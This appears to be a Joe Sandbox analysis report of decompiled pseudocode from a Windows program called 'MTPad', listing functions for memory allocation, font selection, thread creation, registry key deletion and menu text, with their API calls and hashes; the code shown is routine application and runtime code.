                                                                                                                                                                                                                                                                                          				_t15 = __imp__InterlockedPopEntrySList;
                                                                                                                                                                                                                                                                                          				_t3 =  *_t15(_t2);
                                                                                                                                                                                                                                                                                          				if(_t3 == 0) {
                                                                                                                                                                                                                                                                                          					_t18 = VirtualAlloc(0, 0x1000, 0x1000, 0x40);
                                                                                                                                                                                                                                                                                          					if(_t18 != 0) {
                                                                                                                                                                                                                                                                                          						_t16 =  *_t15( *0x170c00);
                                                                                                                                                                                                                                                                                          						if(_t16 == 0) {
                                                                                                                                                                                                                                                                                          							_t1 = _t18 + 0xff0; // 0xff0
                                                                                                                                                                                                                                                                                          							_t17 = _t1;
                                                                                                                                                                                                                                                                                          							do {
                                                                                                                                                                                                                                                                                          								__imp__InterlockedPushEntrySList( *0x170c00, _t18);
                                                                                                                                                                                                                                                                                          								_t18 = _t18 + 0x10;
                                                                                                                                                                                                                                                                                          							} while (_t18 < _t17);
                                                                                                                                                                                                                                                                                          							return _t18;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						VirtualFree(_t18, 0, 0x8000);
                                                                                                                                                                                                                                                                                          						return _t16;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L8;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return _t3;
                                                                                                                                                                                                                                                                                          			}










                                                                                                                                                                                                                                                                                          0x0010571c
                                                                                                                                                                                                                                                                                          0x0010576c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010576c
                                                                                                                                                                                                                                                                                          0x00105727
                                                                                                                                                                                                                                                                                          0x0010572f
                                                                                                                                                                                                                                                                                          0x0010573c
                                                                                                                                                                                                                                                                                          0x00105744
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00105744
                                                                                                                                                                                                                                                                                          0x00105748
                                                                                                                                                                                                                                                                                          0x0010574f
                                                                                                                                                                                                                                                                                          0x00105753
                                                                                                                                                                                                                                                                                          0x00105766
                                                                                                                                                                                                                                                                                          0x0010576a
                                                                                                                                                                                                                                                                                          0x0010577a
                                                                                                                                                                                                                                                                                          0x0010577e
                                                                                                                                                                                                                                                                                          0x00105792
                                                                                                                                                                                                                                                                                          0x00105792
                                                                                                                                                                                                                                                                                          0x00105798
                                                                                                                                                                                                                                                                                          0x0010579f
                                                                                                                                                                                                                                                                                          0x001057a5
                                                                                                                                                                                                                                                                                          0x001057a8
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x001057ac
                                                                                                                                                                                                                                                                                          0x00105788
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010578e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0010576a
                                                                                                                                                                                                                                                                                          0x001057b0

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,0000000D,00000000,00000000,00104307), ref: 00105735
                                                                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 0010573C
                                                                                                                                                                                                                                                                                            • Part of subcall function 00105693: IsProcessorFeaturePresent.KERNEL32(0000000C,00105723,00000000,00000000,00104307), ref: 00105695
                                                                                                                                                                                                                                                                                          • InterlockedPopEntrySList.KERNEL32(00000000,00000000,00000000,00104307), ref: 0010574F
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 00105760
                                                                                                                                                                                                                                                                                          • InterlockedPopEntrySList.KERNEL32 ref: 00105778
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00105788
                                                                                                                                                                                                                                                                                          • InterlockedPushEntrySList.KERNEL32(00000000), ref: 0010579F
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: EntryInterlockedList$AllocHeapVirtual$FeatureFreePresentProcessProcessorPush
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2304957937-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 6b47e8ece9bebb1f120406aff35ca94bba04c159c6b5fee1b5633ccdf854c1ee
                                                                                                                                                                                                                                                                                          • Instruction ID: e5df1f99f957fb011b8c06fd3fdbcf680884d820966216d6f311851b36179eeb
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b47e8ece9bebb1f120406aff35ca94bba04c159c6b5fee1b5633ccdf854c1ee
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FB11C031640F11F7E7335764ED08B6B366AAB89791FA64520F989E61D0CFE4CCC0AE60
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 65%
                                                                                                                                                                                                                                                                                          			E000F7040(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				struct tagLOGFONTA _v68;
                                                                                                                                                                                                                                                                                          				signed int _v172;
                                                                                                                                                                                                                                                                                          				intOrPtr _v208;
                                                                                                                                                                                                                                                                                          				char _v228;
                                                                                                                                                                                                                                                                                          				signed int _t15;
                                                                                                                                                                                                                                                                                          				void* _t21;
                                                                                                                                                                                                                                                                                          				int _t28;
                                                                                                                                                                                                                                                                                          				void* _t30;
                                                                                                                                                                                                                                                                                          				void* _t37;
                                                                                                                                                                                                                                                                                          				void* _t40;
                                                                                                                                                                                                                                                                                          				signed int _t41;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t37 = __edi;
                                                                                                                                                                                                                                                                                          				_t30 = __ebx;
                                                                                                                                                                                                                                                                                          				_t15 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v8 = _t15 ^ _t41;
                                                                                                                                                                                                                                                                                          				_push(__esi);
                                                                                                                                                                                                                                                                                          				_t39 =  &_v228;
                                                                                                                                                                                                                                                                                          				E000FAE50( &_v228);
                                                                                                                                                                                                                                                                                          				_v228 = 0x112d68;
                                                                                                                                                                                                                                                                                          				GetObjectA( *(__edi + 0x4c), 0x3c,  &_v68);
                                                                                                                                                                                                                                                                                          				_v172 = _v172 | 0x00000040;
                                                                                                                                                                                                                                                                                          				_t21 = E000FAEC0(GetActiveWindow(), _t39, __edi, _t39);
                                                                                                                                                                                                                                                                                          				_pop(_t40);
                                                                                                                                                                                                                                                                                          				if(_t21 == 1) {
                                                                                                                                                                                                                                                                                          					if(DeleteObject( *(__edi + 0x4c)) != 0) {
                                                                                                                                                                                                                                                                                          						 *(__edi + 0x4c) = 0;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					_t28 = CreateFontIndirectA( &_v68);
                                                                                                                                                                                                                                                                                          					 *(_t37 + 0x4c) = _t28;
                                                                                                                                                                                                                                                                                          					_t35 =  *(_t37 + 4);
                                                                                                                                                                                                                                                                                          					SendMessageA( *(_t37 + 4), 0x30, _t28, 1);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				_t22 = _v208;
                                                                                                                                                                                                                                                                                          				if(_v208 != 0) {
                                                                                                                                                                                                                                                                                          					E00105701(_t22);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				return E001059E6(0, _t30, _v8 ^ _t41, _t35, _t37, _t40);
                                                                                                                                                                                                                                                                                          			}















                                                                                                                                                                                                                                                                                          0x000f7040
                                                                                                                                                                                                                                                                                          0x000f7040
                                                                                                                                                                                                                                                                                          0x000f7049
                                                                                                                                                                                                                                                                                          0x000f7050
                                                                                                                                                                                                                                                                                          0x000f7053
                                                                                                                                                                                                                                                                                          0x000f7054
                                                                                                                                                                                                                                                                                          0x000f705a
                                                                                                                                                                                                                                                                                          0x000f7069
                                                                                                                                                                                                                                                                                          0x000f7073
                                                                                                                                                                                                                                                                                          0x000f7079
                                                                                                                                                                                                                                                                                          0x000f7088
                                                                                                                                                                                                                                                                                          0x000f708d
                                                                                                                                                                                                                                                                                          0x000f7091
                                                                                                                                                                                                                                                                                          0x000f709f
                                                                                                                                                                                                                                                                                          0x000f70a1
                                                                                                                                                                                                                                                                                          0x000f70a1
                                                                                                                                                                                                                                                                                          0x000f70ac
                                                                                                                                                                                                                                                                                          0x000f70b5
                                                                                                                                                                                                                                                                                          0x000f70b8
                                                                                                                                                                                                                                                                                          0x000f70be
                                                                                                                                                                                                                                                                                          0x000f70be
                                                                                                                                                                                                                                                                                          0x000f70c4
                                                                                                                                                                                                                                                                                          0x000f70cc
                                                                                                                                                                                                                                                                                          0x000f70cf
                                                                                                                                                                                                                                                                                          0x000f70cf
                                                                                                                                                                                                                                                                                          0x000f70e3

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                            • Part of subcall function 000FAE50: _memset.LIBCMT ref: 000FAE70
                                                                                                                                                                                                                                                                                            • Part of subcall function 000FAE50: _memset.LIBCMT ref: 000FAE80
                                                                                                                                                                                                                                                                                            • Part of subcall function 000FAE50: _memset.LIBCMT ref: 000FAE8D
                                                                                                                                                                                                                                                                                          • GetObjectA.GDI32(?,0000003C,?), ref: 000F7073
                                                                                                                                                                                                                                                                                          • GetActiveWindow.USER32 ref: 000F7080
                                                                                                                                                                                                                                                                                            • Part of subcall function 000FAEC0: GetCurrentThreadId.KERNEL32 ref: 000FAED6
                                                                                                                                                                                                                                                                                            • Part of subcall function 000FAEC0: EnterCriticalSection.KERNEL32(00170C68), ref: 000FAEE4
                                                                                                                                                                                                                                                                                            • Part of subcall function 000FAEC0: LeaveCriticalSection.KERNEL32(00170C68), ref: 000FAEFE
                                                                                                                                                                                                                                                                                            • Part of subcall function 000FAEC0: ChooseFontA.COMDLG32(?), ref: 000FAF08
                                                                                                                                                                                                                                                                                            • Part of subcall function 000FAEC0: _memmove.LIBCMT ref: 000FAF28
                                                                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 000F7097
                                                                                                                                                                                                                                                                                          • CreateFontIndirectA.GDI32(?), ref: 000F70AC
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000030,00000000,00000001), ref: 000F70BE
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: _memset$CriticalFontObjectSection$ActiveChooseCreateCurrentDeleteEnterIndirectLeaveMessageSendThreadWindow_memmove
                                                                                                                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                                                                                                                          • API String ID: 490426879-2766056989
                                                                                                                                                                                                                                                                                          • Opcode ID: 6f242d29742f7b9ca41c67650c5660087f357bb3b4a228eb7cd1c889e1341f1a
                                                                                                                                                                                                                                                                                          • Instruction ID: 60c58e77c5893d93ef283ad25524bcdd154946d14500e8378f64a12fafd4d1d9
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f242d29742f7b9ca41c67650c5660087f357bb3b4a228eb7cd1c889e1341f1a
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A2115E70A10218EBDB24DBA1DD45BAEB7B8BF48340F008558F609E7980CB71A984DB91
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 86%
                                                                                                                                                                                                                                                                                          			E000F9E80(void* __ecx, signed int* __esi, void _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                                          				void* _t9;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t10;
                                                                                                                                                                                                                                                                                          				void* _t19;
                                                                                                                                                                                                                                                                                          				void* _t22;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				if( *__esi != 0x3f) {
                                                                                                                                                                                                                                                                                          					_push(8);
                                                                                                                                                                                                                                                                                          					_t9 = E001065FC(_t19, _t22, __esi, __eflags);
                                                                                                                                                                                                                                                                                          					 *_t9 = _a4;
                                                                                                                                                                                                                                                                                          					 *((intOrPtr*)(_t9 + 4)) = _a8;
                                                                                                                                                                                                                                                                                          					_t10 = CreateThread(0, 0, E000F9D30, _t9, 0,  &_v8);
                                                                                                                                                                                                                                                                                          					__eflags = _t10;
                                                                                                                                                                                                                                                                                          					if(_t10 != 0) {
                                                                                                                                                                                                                                                                                          						 *(__esi + 4 +  *__esi * 4) = _t10;
                                                                                                                                                                                                                                                                                          						 *__esi =  *__esi + 1;
                                                                                                                                                                                                                                                                                          						__eflags =  *__esi;
                                                                                                                                                                                                                                                                                          						return _v8;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						MessageBoxA(_t10, "Cannot create thread!!!", "MTPad", _t10);
                                                                                                                                                                                                                                                                                          						__eflags = 0;
                                                                                                                                                                                                                                                                                          						return 0;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					MessageBoxA(0, "ERROR: Cannot create ANY MORE threads!!!", "MTPad", 0);
                                                                                                                                                                                                                                                                                          					return 0;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}








                                                                                                                                                                                                                                                                                          0x000f9e87
                                                                                                                                                                                                                                                                                          0x000f9ea5
                                                                                                                                                                                                                                                                                          0x000f9ea7
                                                                                                                                                                                                                                                                                          0x000f9eb5
                                                                                                                                                                                                                                                                                          0x000f9ec7
                                                                                                                                                                                                                                                                                          0x000f9eca
                                                                                                                                                                                                                                                                                          0x000f9ed0
                                                                                                                                                                                                                                                                                          0x000f9ed2
                                                                                                                                                                                                                                                                                          0x000f9ef0
                                                                                                                                                                                                                                                                                          0x000f9ef4
                                                                                                                                                                                                                                                                                          0x000f9ef4
                                                                                                                                                                                                                                                                                          0x000f9efc
                                                                                                                                                                                                                                                                                          0x000f9ed4
                                                                                                                                                                                                                                                                                          0x000f9ee0
                                                                                                                                                                                                                                                                                          0x000f9ee6
                                                                                                                                                                                                                                                                                          0x000f9eeb
                                                                                                                                                                                                                                                                                          0x000f9eeb
                                                                                                                                                                                                                                                                                          0x000f9e89
                                                                                                                                                                                                                                                                                          0x000f9e97
                                                                                                                                                                                                                                                                                          0x000f9ea2
                                                                                                                                                                                                                                                                                          0x000f9ea2

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Message$CreateThread
                                                                                                                                                                                                                                                                                          • String ID: Cannot create thread!!!$ERROR: Cannot create ANY MORE threads!!!$MTPad
                                                                                                                                                                                                                                                                                          • API String ID: 329949306-3826758181
                                                                                                                                                                                                                                                                                          • Opcode ID: c346d82a43e3d6d8ee34d97ac47f8e6a0a3ad96472ae09dbab7caa5b5cb28a12
                                                                                                                                                                                                                                                                                          • Instruction ID: 2f203c75553ac65725080ea3b6058f71cba6d0acc475a5a205f2f4fb8925f98c
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c346d82a43e3d6d8ee34d97ac47f8e6a0a3ad96472ae09dbab7caa5b5cb28a12
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C101F730780308BFD354DF54DC06F76B7A8FF28702F108169F9449B680D6B1A8609751
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                                                                                                                          			E000F1740(void** __eax, char* __ebx) {
                                                                                                                                                                                                                                                                                          				struct HINSTANCE__* _t7;
                                                                                                                                                                                                                                                                                          				_Unknown_base(*)()* _t8;
                                                                                                                                                                                                                                                                                          				void* _t14;
                                                                                                                                                                                                                                                                                          				void* _t18;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t18 = __eax[2];
                                                                                                                                                                                                                                                                                          				if(_t18 == 0) {
                                                                                                                                                                                                                                                                                          					return RegDeleteKeyA( *__eax, __ebx);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t14 =  *__eax;
                                                                                                                                                                                                                                                                                          					if( *_t18 == 0) {
                                                                                                                                                                                                                                                                                          						if( *((intOrPtr*)(_t18 + 4)) == 0) {
                                                                                                                                                                                                                                                                                          							goto L7;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							return RegDeleteKeyA(_t14, __ebx);
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t7 = GetModuleHandleA("Advapi32.dll");
                                                                                                                                                                                                                                                                                          						if(_t7 == 0) {
                                                                                                                                                                                                                                                                                          							L7:
                                                                                                                                                                                                                                                                                          							return 1;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t8 = GetProcAddress(_t7, "RegDeleteKeyTransactedA");
                                                                                                                                                                                                                                                                                          							if(_t8 == 0) {
                                                                                                                                                                                                                                                                                          								goto L7;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								return  *_t8(_t14, __ebx, 0, 0,  *_t18, 0);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}







                                                                                                                                                                                                                                                                                          0x000f1741
                                                                                                                                                                                                                                                                                          0x000f1746
                                                                                                                                                                                                                                                                                          0x000f17a3
                                                                                                                                                                                                                                                                                          0x000f1748
                                                                                                                                                                                                                                                                                          0x000f174c
                                                                                                                                                                                                                                                                                          0x000f174e
                                                                                                                                                                                                                                                                                          0x000f1783
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f1785
                                                                                                                                                                                                                                                                                          0x000f178f
                                                                                                                                                                                                                                                                                          0x000f178f
                                                                                                                                                                                                                                                                                          0x000f1750
                                                                                                                                                                                                                                                                                          0x000f1755
                                                                                                                                                                                                                                                                                          0x000f175d
                                                                                                                                                                                                                                                                                          0x000f1790
                                                                                                                                                                                                                                                                                          0x000f1797
                                                                                                                                                                                                                                                                                          0x000f175f
                                                                                                                                                                                                                                                                                          0x000f1765
                                                                                                                                                                                                                                                                                          0x000f176d
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000f176f
                                                                                                                                                                                                                                                                                          0x000f177e
                                                                                                                                                                                                                                                                                          0x000f177e
                                                                                                                                                                                                                                                                                          0x000f176d
                                                                                                                                                                                                                                                                                          0x000f175d
                                                                                                                                                                                                                                                                                          0x000f174e

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(Advapi32.dll,?,00000000,000F1A7A,?,?,00000000,?,?), ref: 000F1755
                                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedA), ref: 000F1765
                                                                                                                                                                                                                                                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 000F1787
                                                                                                                                                                                                                                                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 000F179C
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Delete$AddressHandleModuleProc
                                                                                                                                                                                                                                                                                          • String ID: Advapi32.dll$RegDeleteKeyTransactedA
                                                                                                                                                                                                                                                                                          • API String ID: 636244128-1972538232
                                                                                                                                                                                                                                                                                          • Opcode ID: aeb78d44471607fff8e81420895a5a986acea7593427d9a315d952648688787f
                                                                                                                                                                                                                                                                                          • Instruction ID: 72a7484aab7ac5c1bb2981776432a7bc271b3619892c80a80e59948d3d10e669
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: aeb78d44471607fff8e81420895a5a986acea7593427d9a315d952648688787f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 68F04431604314ABE665AB65FC88FF673ECEB84B51F154059F10897594C7B0ACC59660
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E000FB100(struct HMENU__* __eax, void* __ecx) {
                                                                                                                                                                                                                                                                                          				CHAR* _t14;
                                                                                                                                                                                                                                                                                          				void* _t17;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t4 = __eax;
                                                                                                                                                                                                                                                                                          				_t17 = __ecx;
                                                                                                                                                                                                                                                                                          				 *((intOrPtr*)(__ecx + 0x10)) = __eax;
                                                                                                                                                                                                                                                                                          				if(__eax == 0) {
                                                                                                                                                                                                                                                                                          					L2:
                                                                                                                                                                                                                                                                                          					_t14 = _t17 + 0x14;
                                                                                                                                                                                                                                                                                          					if(_t14 == 0) {
                                                                                                                                                                                                                                                                                          						L6:
                                                                                                                                                                                                                                                                                          						return _t4;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					if(lstrlenA("(empty)") <= 0x103) {
                                                                                                                                                                                                                                                                                          						_t4 = lstrcpynA(_t14, "(empty)", lstrlenA("(empty)") + 1);
                                                                                                                                                                                                                                                                                          						goto L6;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					return lstrcpynA(_t14, "(empty)", 0x104);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t4 = GetMenuStringA(__eax, 0xe110, __ecx + 0x14, 0x104, 0);
                                                                                                                                                                                                                                                                                          					if(_t4 != 0) {
                                                                                                                                                                                                                                                                                          						return _t4;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						goto L2;
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}





                                                                                                                                                                                                                                                                                          0x000fb100
                                                                                                                                                                                                                                                                                          0x000fb101
                                                                                                                                                                                                                                                                                          0x000fb103
                                                                                                                                                                                                                                                                                          0x000fb108
                                                                                                                                                                                                                                                                                          0x000fb125
                                                                                                                                                                                                                                                                                          0x000fb126
                                                                                                                                                                                                                                                                                          0x000fb12b
                                                                                                                                                                                                                                                                                          0x000fb16c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fb16c
                                                                                                                                                                                                                                                                                          0x000fb13f
                                                                                                                                                                                                                                                                                          0x000fb166
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fb166
                                                                                                                                                                                                                                                                                          0x000fb156
                                                                                                                                                                                                                                                                                          0x000fb10a
                                                                                                                                                                                                                                                                                          0x000fb11b
                                                                                                                                                                                                                                                                                          0x000fb123
                                                                                                                                                                                                                                                                                          0x000fb16e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fb123

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetMenuStringA.USER32(00000000,0000E110,?,00000104,00000000), ref: 000FB11B
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32((empty),?,?,000F8056), ref: 000FB138
                                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,(empty),00000104), ref: 000FB14E
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32((empty)), ref: 000FB15C
                                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,(empty),00000001), ref: 000FB166
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
